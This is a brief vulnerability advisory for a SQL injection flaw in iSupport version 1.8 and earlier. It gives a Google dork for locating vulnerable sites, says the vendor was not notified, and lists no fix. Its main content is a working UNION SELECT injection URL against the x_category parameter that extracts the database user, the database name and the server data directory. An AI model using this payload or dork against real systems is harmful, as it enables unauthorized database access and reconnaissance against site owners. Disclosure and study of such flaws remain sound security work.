iSupport 1.8 SQL Injection Vulnerability

2011-06-23 12:15:06

iSupport 1.8 SQL Injection Vulnerability

# Date: 2011-06-23
# Author: Brendan Coles <[email protected]>
# Advisory: http://itsecuritysolutions.org/2011-06-23-iSupport-1.8-SQL-Injection-Vulnerability/

# Software: iSupport
# Version: <= 1.8
# Homepage: http://www.idevspot.com/iSupport.php
# Google Dork: "Powered by [ iSupport 1.8 ]"

# Vendor: idevSpot
# Homepage: http://www.idevspot.com/
# Notified: Unnotified

# SQL Injection:

http://localhost/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=null union select null,concat(user(),0x3a,database(),0x3a,@@datadir),null,null,null,null--

Fixes

No fixes

In order to submit a new fix you need to be registered.